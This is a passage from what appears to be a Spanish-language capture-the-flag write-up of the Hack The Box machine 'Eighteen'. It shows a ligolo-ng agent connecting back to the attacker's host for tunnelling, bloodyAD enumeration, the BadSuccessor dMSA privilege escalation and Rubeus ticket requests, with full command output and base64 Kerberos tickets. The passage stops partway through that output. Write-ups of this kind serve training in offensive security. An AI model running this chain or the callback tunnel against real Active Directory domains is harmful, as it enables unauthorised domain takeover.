class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49684 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49689 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">808</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49703 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2656</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:57599 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2636</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:53 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2656</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:389 <span class="o">[</span>::1<span class="o">]</span>:49682 ESTABLISHED <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:389 <span class="o">[</span>::1<span class="o">]</span>:49683 ESTABLISHED <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:389 <span class="o">[</span>::1<span class="o">]</span>:49702 ESTABLISHED <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:389 <span class="o">[</span>::1<span class="o">]</span>:63339 ESTABLISHED <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::1<span class="o">]</span>:1434 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2684</span> </span></span><span class="line"><span class="cl"><span class="c1"># [... cut ..]</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Iniciamos una nueva sesion con <a href="https://github.com/adityatelange/evil-winrm-py">evil-winrm-py</a>, subimos el <a href="https://github.com/nicocha30/ligolo-ng/releases">agente</a> de ligolo-ng a la maquina y realizamos una conexion a nuestro proxy.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; upload ../www/agent.exe agent.exe </span></span><span class="line"><span class="cl">Uploading /home/kali/htb/www/agent.exe: 6.44MB <span class="o">[</span>00:18, 362kB/s<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> File uploaded successfully as: C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments<span class="se">\a</span>gent.exe </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; ./agent.exe -connect 10.10.14.64:443 -ignore-cert </span></span></code></pre></td></tr></table> </div> </div><p>Localmente, tras ejecutar el proxy seleccionamos la sesion, creamos una interfaz, iniciamos el tunel y agregamos una ruta para los <a href="https://docs.ligolo.ng/Localhost/">puertos locales</a>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># localhost ports</span> </span></span><span class="line"><span class="cl">sudo ./proxy -selfcert -laddr 0.0.0.0:443 </span></span><span class="line"><span class="cl">session <span class="c1"># select &lt;eighteen session number&gt;</span> </span></span><span class="line"><span class="cl">interface_create --name eighteen </span></span><span class="line"><span class="cl">tunnel_start --tun eighteen </span></span><span class="line"><span class="cl">interface_add_route --name eighteen --route 240.0.0.0/4 </span></span></code></pre></td></tr></table> </div> </div><p>Vemos que localmente logramos el acceso por medio de ldap.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ nxc ldap 240.0.0.0 -u adam.scott -p iloveyou1 </span></span><span class="line"><span class="cl">LDAP 240.0.0.0 <span class="m">389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">11</span> / Server <span class="m">2025</span> Build <span class="m">26100</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:eighteen.htb<span class="o">)</span> <span class="o">(</span>signing:Enforced<span class="o">)</span> <span class="o">(</span>channel binding:No TLS cert<span class="o">)</span> </span></span><span class="line"><span class="cl">LDAP 240.0.0.0 <span class="m">389</span> DC01 <span class="o">[</span>+<span class="o">]</span> eighteen.htb<span class="se">\a</span>dam.scott:iloveyou1 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="privesc">Privesc</h1> <p>Tras ejecutar <a href="https://github.com/SpecterOps/SharpHound">SharpHound</a> y Bloodhound, no se encontro permisos o grupos relevantes para adam, unicamente REMOTE MANAGEMENT USERS el cual permite a este usuario acceder por WinRM.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2026_2001020361136.png"></p> <h2 id="bloodyad---create_child">BloodyAD - CREATE_CHILD</h2> <p>Ejecutamos <code>bloodyAD</code> para listar los objetos a los que adamn tiene permisos. Se muestra que tiene el permiso <code>CREATE_CHILD</code> al OU <code>Staff</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ bloodyAD --host 240.0.0.0 -d eighteen.htb -u adam.scott -p iloveyou1 get writable </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>S-1-5-11,CN<span class="o">=</span>ForeignSecurityPrincipals,DC<span class="o">=</span>eighteen,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">permission: WRITE </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">OU</span><span class="o">=</span>Staff,DC<span class="o">=</span>eighteen,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">permission: CREATE_CHILD </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>adam.scott,OU<span class="o">=</span>Staff,DC<span class="o">=</span>eighteen,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">permission: WRITE </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="badsuccessor">BadSuccessor</h2> <p>El permiso <code>CREATE_CHILD</code> nos permite realizar un ataque &ldquo;BadSuccessor&rdquo;, este toma ventaja de cuentas dMSAs y permiso sobre un OU.</p> <p>Ref.</p> <ul> <li><a href="https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory#badsuccessor">BadSuccessor: Abusing dMSA &hellip;</a></li> <li><a href="https://www.rayanle.cat/hackin-2025-one-directory/#badsuccessor-administrator">badSuccessor (Administrator)</a></li> <li><a href="https://unit42.paloaltonetworks.com/badsuccessor-attack-vector/">When Good Accounts Go Bad&hellip;</a>.</li> </ul> <h2 id="exploit">Exploit</h2> <p>Para realizar la explotacion utilizamos <a href="https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1">BadSuccessor</a>, importando este con <code>Import-Module</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; upload ../www/BadSuccessor.ps1 BadSuccessor.ps1 </span></span><span class="line"><span class="cl">Uploading /home/kali/htb/www/BadSuccessor.ps1: 100%<span class="p">|</span>███████████████████████████████████████████████████████████████████████████████████████████████<span class="p">|</span> 16.3k/16.3k <span class="o">[</span>00:00&lt;00:00, 77.2kB/s<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> File uploaded successfully as: C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments<span class="se">\B</span>adSuccessor.ps1 </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; Import-Module ./BadSuccessor.ps1 </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos especificando el OU, nombre del dMSA, nuestro usuario y el usuario privilegiado u objetivo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; BadSuccessor -mode exploit -Path <span class="s2">&#34;OU=Staff,DC=eighteen,DC=htb&#34;</span> -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb </span></span><span class="line"><span class="cl">Creating dMSA at: LDAP://eighteen.htb/OU<span class="o">=</span>Staff,DC<span class="o">=</span>eighteen,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="m">0</span> </span></span><span class="line"><span class="cl">Successfully created and configured dMSA <span class="s1">&#39;bad&#39;</span> </span></span><span class="line"><span class="cl">Object adam.scott can now impersonate Administrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Con Rubeus solicitamos un nuevo ticket de nuestro usuario.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; ./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ______ _ </span></span><span class="line"><span class="cl"> <span class="o">(</span>_____ <span class="se">\ </span> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> _____<span class="o">)</span> <span class="o">)</span>_ _<span class="p">|</span> <span class="p">|</span>__ _____ _ _ ___ </span></span><span class="line"><span class="cl"> <span class="p">|</span> __ /<span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _ <span class="se">\|</span> ___ <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>/___<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> <span class="se">\ \|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span> <span class="p">|</span>_<span class="o">)</span> <span class="o">)</span> ____<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>____/<span class="p">|</span>____/<span class="p">|</span>_____<span class="o">)</span>____/<span class="o">(</span>___/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.3.3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Action: Ask TGT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using domain controller: dc01.eighteen.htb <span class="o">(</span>fe80::285a:ee4c:16d2:ba3f%3<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Pre-Authentication required! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> AES256 Salt: EIGHTEEN.HTBadam.scott </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> AES128 Salt: EIGHTEEN.HTBadam.scott </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Etype <span class="m">23</span> Salt: &lt;not provided&gt; </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using rc4_hmac hash: 9964DAE494A77414E34AFF4F34412166 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Building AS-REQ <span class="o">(</span>w/ preauth<span class="o">)</span> <span class="k">for</span>: <span class="s1">&#39;eighteen.htb\adam.scott&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using domain controller: fe80::285a:ee4c:16d2:ba3f%3:88 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> TGT request successful! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> base64<span class="o">(</span>ticket.kirbi<span class="o">)</span>: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEv+k1lN0M/0UViXZmpYoc2Vhurw5hY+Zbte4cFcKVnHia0DHHeEfhcQfvpAsmu82EFSKN8Rq2S135dR9M6e3eToS3fNrfBavs2bOCuK56O6Pzm6bj+g1Cm/ydhb6YQwarsFPzDnQKQLq6ozParO/fgXyM9EBzOsYlEzQox1scD1V4CCB7ZTQqqPou8/bv/aYsSKx3CAS9gGk8SExJxKvsV3jVNktZxciGEhufzVyfYVsubtAW+zztwyqQtP90xRAPA1+XM3/2iYl/FE5bJZ2zK7gPPyH52ek9m4hbwG2DdG1xoz9trJJaLLtViDS8CcGm8W/MJnWV+re08Qvn08RHxpGEpwCnLUUpagjCTbPQ7GNeFjCnozVfd6oqPn952EU4MbiwQI3mNc/SxdBNC8U3x+6JNkB9kxq60GjjgdSWyLXMakToB75jXY6EQAc2tHJ8PEid4YMq3MPbqj7AqxZt+nUEQghnVjUfixsjngY9lW8TF1vzMqbUvUQdxOwf/aKpQqRWgz5VLWXlcmLtOgBHuqxvYmJYjNw/5fPq5J04di/JfQiNl6AoLbz3CJwB8Svq6b8j81tNwBJw2JKUFshzXVPkDvwugzEUBXX5/tWoz3T7dbo4AgNVV7Yo8uHLkxM6nxh0t/VcbXySToziqygz8oa0xzXPW9tgilKtSds4Mz3wfljGitq4FMroY1L1jD8q3EHVbgXq/aeUT4yn3qegAe4iPbKK6yOzw1ZQXtl552FYeBLz4kcNlDP8D9jmut+WwPLL8/iMZ6+JkfIHvPyn+MFotCJRbsTqj0LOd+ZlhkkPnZWVJG1MZ0X1ACSwcMeR/YnAblzYxIkKb3Z0LeNXgLwFd8vyeJvUWPI2rXDiL6vkOl3k15SQ03qDQlwb+kUHo5OmymVpbkSEAfH7E6ETOW0+XFBGPm44wPKP9AKd2/WavbRdfBgrvpRTNQN39ofsDnoBr1qsMM3BJPrAMKujm1ABMT9ytgBnukxmE5dFPnyLruW+Cq/J9/UQJO9/H0edBS3ZzjXvgoyKENwceG3MWBUqaztPmwxz9pHwijbj15gdaBKgU2D4hD70/CeNTgAyrpB6GrKZ+01C5oUB+mv5kIm9RTNP23SoNjbry6NfHkyU146FxIdOzP40EtON8Z3oo6UDnBe5MFwdbjlz09ldTmJAt46s9mS/dIbYxHsTNi6BOuj0hMqbm+09yZVK1uRASWa+ugEhWe1+fgdxUpzKnC8OY5fzq54dsVD1V6lvzx1rD3GpE5M+lOf6J6lOjehZ8mphd7Ah/e8Vbjn0boh6TpKVStKD2nr9bZlnudOyRwWVIA1Sm70iNV/WD+jr1iQa2eT0pyF2mNWww2jmAsahAh++D8XFy6qM2+ws8WtL6CoYSotH7cE0CNMUDfr2IAOBMbADQa6mJumqwZA8ypa28YBgUSWki+U9CpehLI9DwW3mqYDWUECGQdZphLo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKGhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExNjA5NDQwNFqmERgPMjAyNTExMTYxOTQ0MDRapxEYDzIwMjUxMTIzMDk0NDA0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg<span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ServiceName : krbtgt/EIGHTEEN.HTB </span></span><span class="line"><span class="cl"> ServiceRealm : EIGHTEEN.HTB </span></span><span class="line"><span class="cl"> UserName : adam.scott <span class="o">(</span>NT_PRINCIPAL<span class="o">)</span> </span></span><span class="line"><span class="cl"> UserRealm : EIGHTEEN.HTB </span></span><span class="line"><span class="cl"> StartTime : 11/16/2025 1:44:04 AM </span></span><span class="line"><span class="cl"> EndTime : 11/16/2025 11:44:04 AM </span></span><span class="line"><span class="cl"> RenewTill : 11/23/2025 1:44:04 AM </span></span><span class="line"><span class="cl"> Flags : name_canonicalize, pre_authent, initial, renewable, forwardable </span></span><span class="line"><span class="cl"> KeyType : aes256_cts_hmac_sha1 </span></span><span class="line"><span class="cl"> Base64<span class="o">(</span>key<span class="o">)</span> : ApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKE<span class="o">=</span> </span></span><span class="line"><span class="cl"> ASREP <span class="o">(</span>key<span class="o">)</span> : 9964DAE494A77414E34AFF4F34412166 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Este ultimo lo utilizamos para solicitar uno nuevo ahora para el dMSA que recien fue creado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; ./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:doIFpjCC<span class="o">[</span>...ticket...<span class="o">]</span><span class="nv">R0hURUVOLkhUQg</span><span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ______ _ </span></span><span class="line"><span class="cl"> <span class="o">(</span>_____ <span class="se">\ </span> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> _____<span class="o">)</span> <span class="o">)</span>_ _<span class="p">|</span> <span class="p">|</span>__ _____ _ _ ___ </span></span><span class="line"><span class="cl"> <span class="p">|</span> __ /<span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _ <span class="se">\|</span> ___ <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>/___<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> <span class="se">\ \|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span> <span class="p">|</span>_<span class="o">)</span> <span class="o">)</span> ____<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>____/<span class="p">|</span>____/<span class="p">|</span>_____<span class="o">)</span>____/<span class="o">(</span>___/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.3.3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Action: Ask TGS </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting default etypes <span class="o">(</span>RC4_HMAC, AES<span class="o">[</span>128/256<span class="o">]</span>_CTS_HMAC_SHA1<span class="o">)</span> <span class="k">for</span> the service ticket </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Building DMSA TGS-REQ request <span class="k">for</span> <span class="s1">&#39;bad$&#39;</span> from <span class="s1">&#39;adam.scott&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Sequence number is: <span class="m">993886314</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using domain controller: DC01.eighteen.htb <span class="o">(</span>fe80::285a:ee4c:16d2:ba3f%3<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> TGS request successful! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Ticket successfully imported! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> base64<span class="o">(</span>ticket.kirbi<span class="o">)</span>: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> doIFkjCCBY6gAwIBBaEDAgEWooIEmzCCBJdhggSTMIIEj6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEUzCCBE+gAwIBEqEDAgECooIEQQSCBD1ATcT6DF10JcCiDCZ+n1X8wut2pdMt2jU8B3xhyAOdhnBcRXiw/0t4eSEf2CX+iquUOND3WdYiPVwhID25B/Yw7bXV69tKyQzG6Z5rmHernws1Z2kTQ0JnwMCXIOjXfkUcjbTluTJRPe96rWwFDHJERa1LYVh+G1iTbk5gEnAwVSJ2U+9wUj8fCIS4jum4skw18FEMiqszqi7nkmgLK3mnl+o3iCbyMC3RHIuN8MLbNoMTU0E8Ze0o8uQztHS4H0jMVpS2qofFLOtPL2aMpNV7JBu/qZBLZnEqI5KXi2ANTso2vVwhTwKbhkK/fcWzR8a0y5q1Zxqu15Dz2QPU6DvAtrnoNBpSDM56GaZcOlwosOjaRMW0Z+nEIyPxVN8kKyebB0UnUk3Flhev3I1TzZQ8DupptzNb14JJxErFfFnGg7BBeDFsWy4x3Rr1Hh2FSv8S4OzFIyZvj2jQacuX1bZunrNfAxfTMp+CZoTNjRXBrF69ahlbqb+8yt5GkOxh1CAAxnCegeSU1lx9jGUnAenMtnbvNXf5IBOIJPqePY/s/C1Na/EgEWWo5zE6QBkCfuOgVlxeUT/yq92ZbdJ0GXzmi600/oKtoTk/OuCazmr90NS14wC4yA8YyaEnprv907hD1M+yDCg5hlewrz/izvVszPNh4AjhK6Xhw7txdjsvlJFerHE9xq3+aE1ncWj64i2x1+fpaum2i1C+2WQEGkEuaGvg+2WcYIA6WemTgItmZu687AL0vM5fGbgEnPEsm1gg7J6/ECZE/SNTT0hX6O7LPc5nqld2gsauZGM6UAL5ExJzFzM9spwtLYWHj0MXyLhiQV9IQs3Yp7ukSxAC+sdK0ieSpZymP5pTMc4Pp50kRcBG4icf5f00Qkfnr3oVf7N0OzamQPV411S6b9GCV4N88IXebGs3cAy8r8NaGoRNb0Z+lmvxnDyjZxa5DuC5tEhnCEsLevkTJAuirvraVh1zp5/Y4JTCoMSmIkHePgQ4nLqTQPUXNx5aBexoNMpmeR3rNnvjGiWw7/JtfJpN42IIgJCP54EL8rKNFNrpMEmDZ8DmYBObuyLKxu++5IuByw0CslaMvTO7v8IzWTSiWgGZwovn0t35V3u7U0eBXgLKjBrEQNewzsxtp6WQMSC8d7EOObRl6eu7TdN2wYtB68WhsBKt8UBtkOPJIdMkVOigOJ6BCoXHyPSPxprzN8ESc80T07BAd4RHY2He2aYG879JPpoDZvtre36w/12bGLPVdNtnrzOiuiK3bJHJqy2glee6NbbU/pvHOqFiDxFCzeT+qY0VhNixO7pNCe/iyyLDwztCWU2RSDag1n8kmvJk0fNivaKeJ+FNgd0cs2qlWB0HO2Z9vAutK2SShUnLy2nH/Vf89uF6C0Di/yTWiTZpRAX84TRsV9nDT90i1h7M2EYZP7JwZ2NYGjM41p2n4KOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEILUe3+Ge9uSTgTz6OwJYYEM3+MRgmpTCdydmS10ZfoKQoQ4bDGVpZ2h0ZWVuLmh0YqIRMA+gAwIBAaEIMAYbBGJhZCSjBwMFAEChAAClERgPMjAyNTExMTYwOTQ0MzhaphEYDzIwMjUxMTE2MDk1OTM4WqcRGA8yMDI1MTEyMzA5NDQwNFqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxFSUdIVEVFTi5IVEI<span class="o">=</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ServiceName : krbtgt/EIGHTEEN.HTB </span></span><span class="line"><span class="cl"> ServiceRealm : EIGHTEEN.HTB </span></span><span class="line"><span class="cl"> UserName : bad$ <span class="o">(</span>NT_PRINCIPAL<span class="o">)</span> </span></span><span class="line"><span class="cl"> UserRealm : eighteen.htb </span></span><span class="line"><span class="cl"> StartTime : 11/16/2025 1:44:38 AM </span></span><span class="line"><span class="cl"> EndTime : 11/16/2025 1:59:38 AM </span></span><span class="line"><span class="cl"> RenewTill : 11/23/2025 1:44:04 AM </span></span><span class="line"><span class="cl"> Flags : name_canonicalize, pre_authent, renewable, forwardable </span></span><span class="line"><span class="cl"> KeyType : 